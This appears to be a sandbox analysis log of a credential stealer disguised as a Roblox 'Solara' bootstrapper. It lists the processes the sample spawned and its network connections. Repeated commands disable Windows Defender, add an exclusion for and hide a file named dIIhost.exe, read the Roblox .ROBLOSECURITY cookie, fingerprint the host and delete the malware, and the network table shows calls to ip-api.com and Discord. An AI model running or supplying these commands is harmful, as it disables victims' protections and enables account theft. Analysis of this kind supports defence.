C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
